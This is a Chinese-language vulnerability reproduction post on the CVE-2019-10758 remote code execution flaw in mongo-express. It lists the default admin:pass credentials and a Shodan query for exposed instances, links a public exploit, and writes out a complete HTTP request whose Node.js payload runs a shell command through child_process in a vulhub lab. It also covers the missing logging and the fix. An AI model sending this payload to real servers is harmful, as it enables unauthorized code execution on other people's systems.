mongo-express < 0.54.0 远程命令执行漏洞复现
漏洞简述
mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass
),则可以执行任意node.js代码。
漏洞影响版本
mongo-express < 0.54.0
Shodan 搜索语法
mongo-express http.html:"MongoDB Version"
漏洞exp
https://github.com/masahiro331/CVE-2019-10758
这个exp是用nodejs写的,本身漏洞利用简单。该exp是用来弹mac的计算器,不推荐使用。
漏洞环境搭建
使用vulhub的环境复现。启动一个0.53.0版本的mongo-express,访问http://your-ip:8081
即可查看到Web页面。
直接发送如下数据包,即可执行代码this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
:
POST /checkValid HTTP/1.1 Host: your-ip Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded Content-Length: 124 document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
命令执行成功。
使用exp本身没有问题,不想改exp代码了。
溯源排查
mongo-express 本身没有日志。
使用docker logs 有记录请求url,但未记录ip。
修复方式
升级至0.54.0或之后的版本。
赞赏微信赞赏支付宝赞赏
发表评论